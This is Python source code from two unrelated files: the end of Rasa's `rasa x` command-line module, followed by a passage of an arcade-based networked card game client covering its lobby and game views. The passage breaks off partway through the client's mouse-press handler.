    credentials_path, endpoints_path = _get_credentials_and_endpoints_paths(args)
    endpoints = AvailableEndpoints.read_endpoints(endpoints_path)

    # Point the model endpoint at the locally running Rasa X instance.
    rasa_x_url = f"http://localhost:{args.rasa_x_port}/api"
    _overwrite_endpoints_for_local_x(endpoints, rasa_x_token, rasa_x_url)

    # Inject the server settings the Rasa service expects directly into the
    # parsed argument namespace before handing it to the child process.
    vars(args).update(
        dict(
            nlu_model=None,
            cors="*",
            auth_token=args.auth_token,
            enable_api=True,
            endpoints=endpoints,
        )
    )

    ctx = get_context("spawn")
    p = ctx.Process(
        target=_rasa_service, args=(args, endpoints, rasa_x_url, credentials_path)
    )
    # Daemonized so the background Rasa server dies with the parent process.
    p.daemon = True
    p.start()
    return p
def is_rasa_x_installed() -> bool:
    """Check if Rasa X is installed."""
    # Probe the module spec instead of importing `rasax`: importing would
    # actually load the package and slow down CLI startup.
    spec = importlib.util.find_spec("rasax")
    return spec is not None
def generate_rasa_x_token(length: int = 16):
    """Generate a hexadecimal secret token used to access the Rasa X API.

    A new token is generated on every `rasa x` command.
    """
    import secrets

    # token_hex(n) yields 2*n hexadecimal characters from a CSPRNG.
    return secrets.token_hex(length)
def _configure_logging(args: argparse.Namespace):
    """Configure logging for the `rasa x` command.

    Applies the CLI log level (or the Rasa X default), enables colored and
    file logging, and quiets chatty third-party loggers.
    """
    from rasa.core.utils import configure_file_logging
    from rasa.utils.common import set_log_level

    log_level = args.loglevel or DEFAULT_LOG_LEVEL_RASA_X
    # CLI may pass the level as a name ("DEBUG"); convert to its numeric value.
    if isinstance(log_level, str):
        log_level = logging.getLevelName(log_level)

    logging.basicConfig(level=log_level)
    rasa.utils.io.configure_colored_logging(args.loglevel)

    set_log_level(log_level)
    configure_file_logging(logging.root, args.log_file)

    # Third-party libraries are noisy at INFO; only surface warnings/errors.
    logging.getLogger("werkzeug").setLevel(logging.WARNING)
    logging.getLogger("engineio").setLevel(logging.WARNING)
    logging.getLogger("pika").setLevel(logging.WARNING)
    logging.getLogger("socketio").setLevel(logging.ERROR)

    # Outside of DEBUG mode, suppress everything below WARNING globally.
    if not log_level == logging.DEBUG:
        logging.getLogger().setLevel(logging.WARNING)
        logging.getLogger("py.warnings").setLevel(logging.ERROR)
def is_rasa_project_setup(args: argparse.Namespace, project_path: Text) -> bool:
    """Return True when all mandatory Rasa project files exist in `project_path`."""
    config_path = _get_config_path(args)
    mandatory_files = (config_path, DEFAULT_DOMAIN_PATH)
    return all(
        os.path.exists(os.path.join(project_path, mandatory_file))
        for mandatory_file in mandatory_files
    )
def _validate_rasa_x_start(args: argparse.Namespace, project_path: Text):
    """Validate that `rasa x` can be started from `project_path` with `args`.

    Exits the process with an error message when Rasa X is not installed,
    when the Rasa and Rasa X ports clash, when the directory is not a valid
    Rasa project, or when the domain file cannot be loaded.  A missing
    training-data path only produces a warning.
    """
    if not is_rasa_x_installed():
        rasa.shared.utils.cli.print_error_and_exit(
            "Rasa X is not installed. The `rasa x` "
            "command requires an installation of Rasa X. "
            "Instructions on how to install Rasa X can be found here: "
            "https://rasa.com/docs/rasa-x/."
        )

    if args.port == args.rasa_x_port:
        rasa.shared.utils.cli.print_error_and_exit(
            "The port for Rasa X '{}' and the port of the Rasa server '{}' are the "
            "same. We need two different ports, one to run Rasa X (e.g. delivering the "
            "UI) and another one to run a normal Rasa server.\nPlease specify two "
            "different ports using the arguments '--port' and '--rasa-x-port'.".format(
                args.rasa_x_port, args.port
            )
        )

    if not is_rasa_project_setup(args, project_path):
        rasa.shared.utils.cli.print_error_and_exit(
            "This directory is not a valid Rasa project. Use 'rasa init' "
            "to create a new Rasa project or switch to a valid Rasa project "
            "directory (see https://rasa.com/docs/rasa/command-line-interface#rasa-init)."
        )

    _validate_domain(os.path.join(project_path, DEFAULT_DOMAIN_PATH))

    if args.data and not os.path.exists(args.data):
        # Fixed user-facing grammar: "does not exists" -> "does not exist".
        rasa.shared.utils.cli.print_warning(
            "The provided data path ('{}') does not exist. Rasa X will start "
            "without any training data.".format(args.data)
        )
def _validate_domain(domain_path: Text):
    """Exit with an error message when the domain file at `domain_path` is invalid."""
    from rasa.shared.core.domain import Domain, InvalidDomain

    try:
        Domain.load(domain_path)
    except InvalidDomain as e:
        rasa.shared.utils.cli.print_error_and_exit(
            "The provided domain file could not be loaded. Error: {}".format(e)
        )
def rasa_x(args: argparse.Namespace):
    """Entry point for the `rasa x` CLI command."""
    from rasa.cli.utils import signal_handler

    # Install the Ctrl-C handler before any servers or subprocesses start.
    signal.signal(signal.SIGINT, signal_handler)

    _configure_logging(args)

    if args.production:
        run_in_production(args)
    else:
        run_locally(args)
async def _pull_runtime_config_from_server(
    config_endpoint: Optional[Text],
    attempts: int = 60,
    wait_time_between_pulls: float = 5,
    keys: Iterable[Text] = ("endpoints", "credentials"),
) -> Optional[List[Text]]:
    """Pull runtime config from `config_endpoint`.

    Returns a list of paths to yaml dumps, each containing the contents of one of
    `keys`.  Exits the process when the config cannot be fetched within
    `attempts` tries or when a key is missing from the server response.
    """
    while attempts:
        try:
            async with aiohttp.ClientSession() as session:
                async with session.get(config_endpoint) as resp:
                    if resp.status == 200:
                        rjs = await resp.json()
                        try:
                            # Each requested key is written to its own temp file.
                            return [
                                rasa.utils.io.create_temporary_file(rjs[k])
                                for k in keys
                            ]
                        except KeyError as e:
                            rasa.shared.utils.cli.print_error_and_exit(
                                "Failed to find key '{}' in runtime config. "
                                "Exiting.".format(e)
                            )
                    else:
                        logger.debug(
                            "Failed to get a proper response from remote "
                            "server. Status Code: {}. Response: '{}'"
                            "".format(resp.status, await resp.text())
                        )
        except aiohttp.ClientError as e:
            logger.debug(f"Failed to connect to server. Retrying. {e}")

        # Back off between pulls; the counter also decrements after non-200
        # responses so a persistently failing server cannot loop forever.
        await asyncio.sleep(wait_time_between_pulls)
        attempts -= 1

    rasa.shared.utils.cli.print_error_and_exit(
        "Could not fetch runtime config from server at '{}'. "
        "Exiting.".format(config_endpoint)
    )
def run_in_production(args: argparse.Namespace):
    """Start a Rasa server configured for a production Rasa X deployment."""
    from rasa.shared.utils.cli import print_success

    print_success("Starting Rasa X in production mode... 🚀")

    credentials, endpoints_file = _get_credentials_and_endpoints_paths(args)
    available_endpoints = AvailableEndpoints.read_endpoints(endpoints_file)
    _rasa_service(args, available_endpoints, None, credentials)
def _get_config_path(args: argparse.Namespace,) -> Optional[Text]:
    """Return the validated path to the model configuration file."""
    return rasa.cli.utils.get_validated_path(
        args.config, "config", DEFAULT_CONFIG_PATH
    )
def _get_credentials_and_endpoints_paths(
    args: argparse.Namespace,
) -> Tuple[Optional[Text], Optional[Text]]:
    """Return `(credentials_path, endpoints_path)` for this invocation.

    When `--config-endpoint` is given, both files are pulled from the remote
    server; otherwise the local endpoints file is validated and no
    credentials path is returned.
    """
    config_endpoint = args.config_endpoint
    if config_endpoint:
        # Note the order: the server helper returns (endpoints, credentials).
        endpoints_config_path, credentials_path = rasa.utils.common.run_in_loop(
            _pull_runtime_config_from_server(config_endpoint)
        )
    else:
        endpoints_config_path = rasa.cli.utils.get_validated_path(
            args.endpoints, "endpoints", DEFAULT_ENDPOINTS_PATH, True
        )
        credentials_path = None

    return credentials_path, endpoints_config_path
def run_locally(args: argparse.Namespace):
    """Run Rasa X locally: a background Rasa server plus the local Rasa X app."""
    # noinspection PyUnresolvedReferences
    from rasax.community import local  # pytype: disable=import-error

    args.rasa_x_port = args.rasa_x_port or DEFAULT_RASA_X_PORT
    args.port = args.port or DEFAULT_RASA_PORT

    project_path = "."

    _validate_rasa_x_start(args, project_path)

    rasa_x_token = generate_rasa_x_token()
    # Rasa runs as a separate process; we keep the handle to terminate it below.
    process = start_rasa_for_local_rasa_x(args, rasa_x_token=rasa_x_token)

    config_path = _get_config_path(args)

    telemetry.track_rasa_x_local()

    # noinspection PyBroadException
    try:
        local.main(
            args, project_path, args.data, token=rasa_x_token, config_path=config_path
        )
    except RasaXTermsError:
        # User didn't accept the Rasa X terms.
        pass
    except Exception:
        # Deliberate broad catch: surface the traceback plus a friendly hint
        # instead of crashing the CLI with a raw stack trace.
        print(traceback.format_exc())
        rasa.shared.utils.cli.print_error(
            "Sorry, something went wrong (see error above). Make sure to start "
            "Rasa X with valid data and valid domain and config files. Please, "
            "also check any warnings that popped up.\nIf you need help fixing "
            "the issue visit our forum: https://forum.rasa.com/."
        )
    finally:
        # Always stop the background Rasa server, even on error/exit.
        process.terminate()
|
client.py | """
ZPY Card Game
"""
import threading
import time
import zmq
from zmq import Context, Socket
import arcade
import os
import argparse
import utils
import gamestate, clientelements
from clientelements import Card, GameFlatButton,ResizableGameFlatButton,GameTextLabel
from utils import *
from arcade import gui
import cardpile
from cardpile import calculate_circular_pile_set_positions, Title_Type
from dataclasses import asdict
import uuid
import yaml
# Command-line interface of the client.
parser = argparse.ArgumentParser(description='Card client')
parser.add_argument('-u', dest='server_ip', type=str, help='server ip', default='162.243.211.250')
parser.add_argument('-g', dest='game_file', type=str, help='path to yaml game file', default = os.path.join(os.path.dirname(os.path.abspath(__file__)), "../games/zhaopengyou.yaml"))

# Network
# Iterations per second for the pusher/receiver network threads.
UPDATE_TICK = 30
class CardGame(arcade.Window):
    """Top-level game window; owns the state shared by all views and the
    outgoing event queue drained by the network thread."""

    def __init__(self, game_cfg, *arg, **kargs):
        super().__init__(*arg, **kargs)
        self.game_state = None
        self.event_buffer = []
        self.game_cfg = game_cfg

    def update_game_state(self, gs_dict):
        """ update game state from gs_dict """
        # no GUI change is allowed in this function
        self.game_state = gamestate.GameState(**gs_dict)

    def on_resize(self, width: float, height: float):
        """
        Override this function to add custom code to be called any time the window
        is resized. The only responsibility here is to update the viewport.

        :param float width: New width
        :param float height: New height
        """
        super().on_resize(width, height)
        active_view = self.current_view
        if active_view is None:
            return
        # Forward the resize only to views that actually implement a handler.
        resize_handler = getattr(active_view, "on_resize", None)
        if callable(resize_handler):
            active_view.on_resize(width, height)
class LoadingView(arcade.View):
    """ Screen loading the GUI """

    def __init__(self, game_config, player_id=None):
        super().__init__()
        # Reuse the caller's id when given; otherwise mint a fresh one.
        self.player_id = str(uuid.uuid4()) if player_id is None else player_id
        self.game_config = game_config

    @property
    def game_state(self):
        return self.window.game_state

    def on_draw(self):
        arcade.start_render()
        arcade.draw_text('Loading. Please Wait...', 10, 10, arcade.color.GOLD, 30)

    def on_update(self, deltatime):
        state = self.game_state
        if not state:
            return
        # First state received from the server: build the game view and switch.
        own_index = state.player_index_per_id[self.player_id]
        game_view = GameView(player_id=self.player_id)
        game_view.setup(
            game_config=self.game_config,
            n_player=state.n_player,
            player_index=own_index,
        )
        self.window.show_view(game_view)
class ConnectView(arcade.View):
    """ Screen waiting for people to connect """

    def __init__(self, player_id=None, player_name=None):
        super().__init__()
        # Reuse an existing id (reconnect) or mint a fresh one for this session.
        if player_id is None:
            self.player_id = str(uuid.uuid4())
        else:
            self.player_id = player_id
        self.player_name = player_name
        self.ui_manager = gui.UIManager()
        self.ui_input_box = None  # name entry box, created in setup()
        self.label = None

    @property
    def game_config(self):
        # Config is stored on the window so every view shares the same object.
        return self.window.game_cfg

    @property
    def game_state(self):
        return self.window.game_state

    @property
    def event_buffer(self):
        # Outgoing events; drained by the network pusher thread.
        return self.window.event_buffer

    def on_resize(self, width: float, height: float):
        # This screen uses fixed coordinates; resizing is a no-op.
        pass

    def connect(self):
        """Request the game state and register this player's typed name."""
        new_event = gamestate.EventConnect(type='GetGameState')
        self.event_buffer.append(new_event)
        self.player_name = str(self.ui_input_box.text)
        new_event = gamestate.EventConnect(type='UpdatePlayerInfo',
                                           player_name=self.player_name,
                                           player_id=self.player_id
                                           )
        self.event_buffer.append(new_event)

    def get_game_state(self):
        """Ask the server to broadcast the current game state."""
        new_event = gamestate.EventConnect(type='GetGameState')
        self.event_buffer.append(new_event)

    def send_ready(self):
        """Mark this player ready; only valid once a name was submitted."""
        if self.player_name is not None:
            new_event = gamestate.EventConnect(type='PlayerReady',
                                               player_name=self.player_name,
                                               player_id=self.player_id
                                               )
            self.event_buffer.append(new_event)

    def reset_player_and_game(self):
        """Request a full reset of players (and the game, if one is running)."""
        new_event = gamestate.EventConnect(type='ResetPlayerAndGame')
        self.event_buffer.append(new_event)

    def observe_a_game(self):
        """Join a running game as an observer; requires a submitted name."""
        if self.player_name is not None:
            new_event = gamestate.EventConnect(type='Observe',
                                               player_name=self.player_name,
                                               player_id=self.player_id
                                               )
            self.event_buffer.append(new_event)

    def on_update(self, deltatime):
        game_config = self.game_config
        if self.game_state:
            if self.game_state.status == 'Starting New Game':
                if self.player_id in self.game_state.player_index_per_id:
                    # NOTE(review): player_index is looked up but unused in
                    # this branch — presumably only the membership test matters.
                    player_index = self.game_state.player_index_per_id[self.player_id]
                    self.ui_manager.purge_ui_elements()
                    loading_view = LoadingView(game_config=game_config, player_id=self.player_id)
                    self.window.show_view(loading_view)
            elif self.game_state.status == 'In Game':
                if self.player_id in self.game_state.player_index_per_id:
                    player_index = self.game_state.player_index_per_id[self.player_id]
                    # A negative index appears to mark an observer — TODO confirm
                    # against the server's index assignment.
                    if player_index <= -1:
                        self.ui_manager.purge_ui_elements()
                        loading_view = LoadingView(game_config=game_config, player_id=self.player_id)
                        self.window.show_view(loading_view)

    def setup(self):
        """Build the name input box and the four action buttons."""
        self.ui_input_box = gui.UIInputBox(
            center_x=200,
            center_y=300,
            width=300
        )
        self.ui_manager.add_ui_element(self.ui_input_box)

        connect_button = GameFlatButton(
            self.connect,
            # lambda : self.connect(self.ui_input_box.text),
            text='Connect',
            center_x=200,
            center_y=250,
            width=200
        )
        self.ui_manager.add_ui_element(connect_button)

        submit_button = GameFlatButton(
            self.send_ready,
            # lambda : self.send_ready(self.ui_input_box.text),
            text='READY (Game starts when all players are ready',
            center_x=450,
            center_y=200,
            width=700
        )
        self.ui_manager.add_ui_element(submit_button)

        observe_button = GameFlatButton(
            self.observe_a_game,
            text='OBSERVE (In Game)',
            center_x=450,
            center_y=150,
            width=700
        )
        self.ui_manager.add_ui_element(observe_button)

        clear_button = GameFlatButton(
            self.reset_player_and_game,
            text='Reset Player (and Game if being played)',
            center_x=450,
            center_y=100,
            width=700
        )
        self.ui_manager.add_ui_element(clear_button)

        # Immediately ask the server for the current state.
        self.get_game_state()

    def on_show_view(self):
        """ Called once when view is activated. """
        self.setup()
        arcade.set_background_color(arcade.color.AMAZON)

    def on_hide_view(self):
        self.ui_manager.unregister_handlers()

    def on_draw(self):
        arcade.start_render()
        if self.game_state:
            # Render the lobby: game status plus each player's name and index.
            y_step = 25
            starting_y = 350
            arcade.draw_text(f'Game Status: {self.game_state.status}', 200, starting_y, arcade.color.GOLD, 14)
            starting_y += y_step
            arcade.draw_text('players name | index', 200, starting_y, arcade.color.GOLD, 14)
            for player_id, player_name in self.game_state.player_name_per_id.items():
                starting_y += y_step
                arcade.draw_text(f'{player_name} | {str(self.game_state.player_index_per_id[player_id]) if player_id in self.game_state.player_index_per_id else "not ready"}',
                                 200, starting_y, arcade.color.GOLD, 14)
        else:
            starting_y = 350
            arcade.draw_text(f'Waiting for message from server', 200, starting_y, arcade.color.GOLD, 14)
class GameView(arcade.View):
    """ Main Game View class. """

    def __init__(self, player_id=None):
        super().__init__()
        self.ui_manager = gui.UIManager()
        arcade.set_background_color(arcade.color.AMAZON)
        if player_id is None:
            self.player_id = str(uuid.uuid4())
        else:
            self.player_id = player_id
        self.n_player = None
        self.self_player_index = None
        # List of cards we are dragging with the mouse
        self.held_cards = None
        # Original location of cards we are dragging with the mouse in case they have to go back.
        self.held_cards_original_position = None
        # active cards
        self.active_cards = None
        # card that was pressed on
        self.card_on_press = None
        # Sprite list with all the mats tha cards lay on.
        self.pile_mat_list = None
        self.card_pile_list = None
        self.resize_list = []
        self.game_config = None
        self._size_scaler = 1

    @property
    def game_state(self):
        return self.window.game_state

    @game_state.setter
    def game_state(self, x):
        self.window.game_state = x

    @property
    def event_buffer(self):
        return self.window.event_buffer

    def on_resize(self, width, height):
        # calculate new scaling factor and propagate it to every resizable object
        if self.game_config is not None:
            new_size_scaler = self.calculate_size_scaler(width, height)
            if new_size_scaler is not None:
                if new_size_scaler != self._size_scaler:
                    self._size_scaler = new_size_scaler
                    for resizable_obj in self.resize_list:
                        resizable_obj.size_scaler = self._size_scaler

    def calculate_size_scaler(self, width, height):
        """ calculate size scaler

        :param width: current window width
        :param height: current window height
        :return: scale factor relative to the configured default screen size,
            or None when the config's 'scale_by' value is unrecognized
        """
        scaler_x = width / self.game_config['default_screen_size'][0]
        scaler_y = height / self.game_config['default_screen_size'][1]
        if self.game_config['scale_by'] == 'HEIGHT':
            new_size_scaler = scaler_y
        elif self.game_config['scale_by'] == 'WIDTH':
            new_size_scaler = scaler_x
        elif self.game_config['scale_by'] == 'BOTH':
            # Never exceed either dimension.
            new_size_scaler = min(scaler_x, scaler_y)
        else:
            new_size_scaler = None
        return new_size_scaler
        # print(f'scaler: {self._size_scaler}')

    def on_hide_view(self):
        self.ui_manager.unregister_handlers()

    def clear_all_piles(self):
        """ clear all piles """
        for card_pile in self.card_pile_list:
            card_pile.clear(cache_cleared_values=False)
        self.held_cards = []
        self.held_cards_original_position = []
        self.active_cards = []
        self.card_on_press = None

    @property
    def n_pile(self):
        # Total pile count, derived from the highest pile id in use.
        return max([w.card_pile_id for w in self.card_pile_list]) + 1

    def setup(self, game_config, n_player=None, player_index=0):
        """ Set up the game here. Call this function to restart the game. """
        self.ui_manager.purge_ui_elements()
        self.n_player = n_player
        self.self_player_index = player_index
        # List of cards we are dragging with the mouse
        self.game_config = game_config
        self.held_cards = []
        self.held_cards_original_position = []
        self.active_cards = []
        self.card_pile_list = []
        self.resize_list = []
        self.card_on_press = None

        # --- Create the mats the cards go on.
        # calculate propriate size
        width, height = self.window.get_size()
        new_size_scaler = self.calculate_size_scaler(width, height)
        if new_size_scaler is not None:
            self._size_scaler = new_size_scaler

        # Sprite list with all the mats tha cards lay on.
        self.pile_mat_list: arcade.SpriteList = arcade.SpriteList()

        # First pass: compute the pile-id range belonging to each pile-set tag,
        # so piles can refer to each other (e.g. for auto distribution).
        pile_tag_to_pile_id = {}
        starting_pile_id = 0
        for pile_set in game_config['cardpiles']:
            if pile_set['piletype'] == 'PlayerPile':
                pile_tag_to_pile_id.update({pile_set['pile_set_tag']: list(range(starting_pile_id, starting_pile_id + self.n_player))})
                starting_pile_id += self.n_player
            elif pile_set['piletype'] == 'PublicPile':
                pile_tag_to_pile_id.update(
                    {pile_set['pile_set_tag']: [starting_pile_id]})
                starting_pile_id += 1
            elif pile_set['piletype'] == 'CardDeck':
                pile_tag_to_pile_id.update(
                    {pile_set['pile_set_tag']: [starting_pile_id]})
                starting_pile_id += 1

        # Second pass: actually build the piles from game_config.
        starting_pile_id = 0
        for pile_set in game_config['cardpiles']:
            if pile_set['piletype'] == 'PlayerPile':
                if pile_set['display'] == 'SELF':
                    if self.self_player_index >= 0:
                        card_pile = cardpile.CardPile(
                            card_pile_id=starting_pile_id + self.self_player_index,
                            mat_center=tuple(pile_set['mat_center']),
                            mat_size=tuple(pile_set['mat_size']),
                            mat_boundary=tuple(pile_set['mat_boundary']),
                            card_size=tuple(pile_set['card_size']),
                            card_offset=tuple(pile_set['card_offset']),
                            mat_color=tuple(pile_set['mat_color']),
                            button_width=pile_set['button_width'] if 'button_width' in pile_set else None,
                            button_height=pile_set['button_height'] if 'button_height' in pile_set else None,
                            size_scaler=self._size_scaler,
                            sorting_rule=Sorting_Rule[pile_set['sorting_rule']],
                            auto_sort_setting=Auto_Sort[pile_set['auto_sort_setting']],
                            enable_sort_button=pile_set['enable_sort_button'],
                            enable_clear_button=pile_set['enable_clear_button'],
                            enable_recover_last_removed_cards=pile_set['enable_recover_last_removed_cards'],
                            enable_flip_all=pile_set['enable_flip_all'],
                            enable_face_up_all=pile_set['enable_face_up_all'] if 'enable_face_up_all' in pile_set else False,
                            title_property=pile_set['title'],
                            update_event_handle=self.add_event,
                            other_properties={'player_index': player_index}
                        )
                        self.card_pile_list.append(card_pile)
                        self.pile_mat_list.append(card_pile.mat)
                        self.resize_list.append(card_pile)
                    # NOTE(review): unlike the ALL_PLAYER_CIRCLE branch below,
                    # starting_pile_id is not advanced by n_player here, so ids
                    # of later pile sets may disagree with pile_tag_to_pile_id
                    # computed above — TODO confirm whether SELF display is ever
                    # combined with other pile sets.
                elif pile_set['display'] == 'ALL_PLAYER_CIRCLE':
                    # NOTE(review): this loop variable shadows the
                    # `player_index` parameter; after the loop the parameter's
                    # value is clobbered (n_player - 1) — later uses (e.g. the
                    # CardDeck other_properties) see the clobbered value.
                    for player_index in range(self.n_player):
                        pile_position = calculate_circular_pile_set_positions(
                            starting_mat_center=tuple(pile_set['starting_mat_center']),
                            pile_offset=tuple(pile_set['pile_offset']),
                            piles_per_side=tuple(pile_set['piles_per_side']),
                            player_index=player_index,
                            n_player=self.n_player,
                            pile_position_offset=pile_set['pile_position_offset'],
                            starting_index_type=Pile_Position_Offset[pile_set['pile_position_offset_type']],
                            self_player_index=self.self_player_index,
                            counterclockwise=pile_set['direction'] == 'COUNTERCLOCKWISE'
                        )
                        card_pile = cardpile.CardPile(
                            card_pile_id=player_index + starting_pile_id,
                            mat_center=(pile_position[0], pile_position[1]),
                            mat_size=tuple(pile_set['mat_size']),
                            mat_boundary=tuple(pile_set['mat_boundary']),
                            card_size=tuple(pile_set['card_size']),
                            card_offset=tuple(pile_set['card_offset']),
                            mat_color=tuple(pile_set['self_mat_color']) if (player_index == self.self_player_index and 'self_mat_color' in pile_set) else tuple(pile_set['mat_color']),
                            button_width=pile_set['button_width'] if 'button_width' in pile_set else None,
                            button_height=pile_set['button_height'] if 'button_height' in pile_set else None,
                            size_scaler=self._size_scaler,
                            sorting_rule=Sorting_Rule[pile_set['sorting_rule']],
                            auto_sort_setting=Auto_Sort[pile_set['auto_sort_setting']],
                            enable_sort_button=pile_set['enable_sort_button'],
                            enable_clear_button=pile_set['enable_clear_button'],
                            enable_recover_last_removed_cards=pile_set['enable_recover_last_removed_cards'],
                            enable_flip_all=pile_set['enable_flip_all'],
                            enable_face_up_all=pile_set['enable_face_up_all'] if 'enable_face_up_all' in pile_set else False,
                            title_property=pile_set['title'],
                            update_event_handle=self.add_event,
                            other_properties={'player_index': player_index}
                        )
                        self.card_pile_list.append(card_pile)
                        self.pile_mat_list.append(card_pile.mat)
                        self.resize_list.append(card_pile)
                    # add starting pile id
                    starting_pile_id += self.n_player
            elif pile_set['piletype'] == 'PublicPile':
                # if pile_set['display'] == 'ALL':
                card_pile = cardpile.CardPile(
                    card_pile_id=starting_pile_id,
                    mat_center=tuple(pile_set['mat_center']),
                    mat_size=tuple(pile_set['mat_size']),
                    mat_boundary=tuple(pile_set['mat_boundary']),
                    card_size=tuple(pile_set['card_size']),
                    card_offset=tuple(pile_set['card_offset']),
                    mat_color=tuple(pile_set['mat_color']),
                    button_width=pile_set['button_width'] if 'button_width' in pile_set else None,
                    button_height=pile_set['button_height'] if 'button_height' in pile_set else None,
                    size_scaler=self._size_scaler,
                    sorting_rule=Sorting_Rule[pile_set['sorting_rule']],
                    auto_sort_setting=Auto_Sort[pile_set['auto_sort_setting']],
                    enable_sort_button=pile_set['enable_sort_button'],
                    enable_clear_button=pile_set['enable_clear_button'],
                    enable_recover_last_removed_cards=pile_set['enable_recover_last_removed_cards'],
                    enable_flip_all=pile_set['enable_flip_all'],
                    enable_face_up_all=pile_set['enable_face_up_all'] if 'enable_face_up_all' in pile_set else False,
                    title_property=pile_set['title'],
                    update_event_handle=self.add_event
                )
                self.card_pile_list.append(card_pile)
                self.pile_mat_list.append(card_pile.mat)
                self.resize_list.append(card_pile)
                starting_pile_id += 1
            elif pile_set['piletype'] == 'CardDeck':
                # if pile_set['display'] == 'ALL':
                card_pile = cardpile.CardDeck(
                    card_pile_id=starting_pile_id,
                    mat_center=tuple(pile_set['mat_center']),
                    mat_size=tuple(pile_set['mat_size']),
                    mat_boundary=tuple(pile_set['mat_boundary']),
                    card_size=tuple(pile_set['card_size']),
                    card_offset=tuple(pile_set['card_offset']),
                    mat_color=tuple(pile_set['mat_color']),
                    button_width=pile_set['button_width'] if 'button_width' in pile_set else None,
                    button_height=pile_set['button_height'] if 'button_height' in pile_set else None,
                    vertical_button_width=pile_set['vertical_button_width'],
                    vertical_button_height=pile_set['vertical_button_height'],
                    size_scaler=self._size_scaler,
                    per_deck_cards=pile_set['per_deck_cards'],
                    face_down=pile_set['face_down'],
                    enable_clear_button=pile_set['enable_clear_button'],
                    enable_flip_all=pile_set['enable_flip_all'],
                    enable_face_up_all=pile_set['enable_face_up_all'] if 'enable_face_up_all' in pile_set else False,
                    enable_generation=pile_set['enable_generation'],
                    num_of_decks_per_generation=pile_set['num_of_decks_per_generation'],
                    enable_auto_distribution=pile_set['enable_auto_distribution'],
                    destination_piles_and_cards=pile_set['destination_piles_and_cards'],
                    title_property=pile_set['title'],
                    update_event_handle=self.add_event,
                    other_properties={'player_index': player_index,
                                      'constants': {'CONST_NPLAYER': self.n_player},
                                      'pile_tag_to_pile_id': pile_tag_to_pile_id
                                      },
                )
                self.card_pile_list.append(card_pile)
                self.pile_mat_list.append(card_pile.mat)
                self.resize_list.append(card_pile)
                starting_pile_id += 1

        # add ui element
        for card_pile in self.card_pile_list:
            new_ui_elments = card_pile.get_ui_elements()
            for element in new_ui_elments:
                self.ui_manager.add_ui_element(element)

        # Global game buttons (restart / reset) from the config file.
        for game_button in game_config['gamebuttons']:
            new_game_button = ResizableGameFlatButton(
                click_event=self.initiate_game_restart if game_button['action'] == 'initiate_game_restart' else (
                    self.reset_player_and_game if game_button['action'] == 'reset_player_and_game' else None),
                width=game_button['size'][0],
                height=game_button['size'][1],
                center_x=game_button['center'][0],
                center_y=game_button['center'][1],
                size_scaler=self._size_scaler,
                font_size=game_button['font_size'],
                bg_color=tuple(game_button['bg_color']),
                text=game_button['text']
            )
            self.ui_manager.add_ui_element(new_game_button)
            self.resize_list.append(new_game_button)

    def on_update(self, delta_time):
        """ on update, which is called in the event loop."""
        if self.game_state:
            if self.game_state.status == 'Wait for Player to Join':
                # Server went back to the lobby: switch to the connect screen.
                self.ui_manager.purge_ui_elements()
                connect_view = ConnectView(player_id=self.player_id)
                connect_view.setup()
                self.window.show_view(connect_view)
                return
            elif self.game_state.status == 'New Game':
                self.game_state.status = 'In Game'
                self.clear_all_piles()

            held_cards_value = [w.value for w in self.held_cards]
            active_cards_value = [w.value for w in self.active_cards]

            # update piles
            for w in self.card_pile_list:
                if w.card_pile_id not in self.game_state.cards_in_pile:
                    card_changed_removed = w.from_value_face([],
                                                             self.game_state.cards_status)
                else:
                    card_changed_removed = w.from_value_face(self.game_state.cards_in_pile[w.card_pile_id],
                                                             self.game_state.cards_status)
                # check whether hand-held cards affected
                for card_value in card_changed_removed:
                    if card_value in held_cards_value:
                        index = held_cards_value.index(card_value)
                        if self.held_cards[index] == self.card_on_press:
                            self.card_on_press = None
                        self.held_cards.remove(self.held_cards[index])
                        self.held_cards_original_position.remove(self.held_cards_original_position[index])
                        held_cards_value.remove(held_cards_value[index])
                    if card_value in active_cards_value:
                        index = active_cards_value.index(card_value)
                        self.active_cards[index].active = False
                        self.active_cards.remove(self.active_cards[index])
                        active_cards_value.remove(active_cards_value[index])

                # Keep each pile's title (player name or score) in sync.
                if w.title_type == Title_Type.PLAYER_NAME:
                    if 'player_index' in w.other_properties:
                        if w.other_properties['player_index'] in self.game_state.player_name:
                            if w.title != self.game_state.player_name[w.other_properties['player_index']]:
                                w.title = self.game_state.player_name[w.other_properties['player_index']]
                elif w.title_type == Title_Type.SCORE:
                    if 'score_type' in w._title_property:
                        scores = utils.calculate_score(w.to_valuelist(), utils.Score_Rule[w._title_property['score_type']])
                        if w.title != str(scores):
                            if w.title.isdigit() or scores > 0:
                                w.title = str(scores)

                if w.card_pile_id in self.game_state.pile_property:
                    w.update_ui_property(self.game_state.pile_property[w.card_pile_id])

    def on_draw(self):
        """ Render the screen. """
        arcade.start_render()

        # Draw the mats the cards go on to
        self.pile_mat_list.draw()
        # Reverse order so earlier-configured piles draw on top.
        for card_pile in self.card_pile_list[::-1]:
            card_pile.draw()

    def get_pile_for_card(self, card):
        """Return the pile containing `card`, or None when no pile has it."""
        for index, pile in enumerate(self.card_pile_list):
            if card in pile:
                return pile

    def on_mouse_press(self, x, y, button, key_modifiers):
        """ Called when the user presses a mouse button. """
        self.card_on_press = None
        c_mats = arcade.get_sprites_at_point((x, y), self.pile_mat_list)
        if len(c_mats) > 0:
            c_card_pile = c_mats[0].cardpile
            if button == arcade.MOUSE_BUTTON_RIGHT and (key_modifiers & arcade.key.MOD_ALT):
                # with control, sort current piles
                c_card_pile.resort_cards()
            elif button == arcade.MOUSE_BUTTON_RIGHT and (key_modifiers & arcade.key.MOD_CTRL):
                # NOTE(review): clear_a_pile is not defined in this class in the
                # visible code — TODO confirm it exists elsewhere.
                self.clear_a_pile(c_card_pile)
            else:
                cards = arcade.get_sprites_at_point((x, y), c_card_pile)
                if len(cards) > 0:
                    # Topmost sprite under the cursor.
                    primary_card = cards[-1]
                    if button == arcade.MOUSE_BUTTON_LEFT:
                        self.card_on_press = primary_card
                        if not primary_card.active:
                            if len(self.active_cards) >= 1:
                                # check if the pile being clicked on is the same as the active cards
                                current_pile = self.get_pile_for_card(self.card_on_press)
                                active_card_pile = self.get_pile_for_card(self.active_cards[0])
                                if current_pile != active_card_pile:
                                    # if the card being clicked on belongs to a different pile than those active cards. deactive other cards
                                    for card in self.active_cards:
                                        card.active = False
                                    self.active_cards = []
                        # will held this regardless whether its active
                        self.held_cards.append(primary_card)
                        self.held_cards_original_position.append(primary_card.position)
                        # all active card will move together
                        for card in self.active_cards:
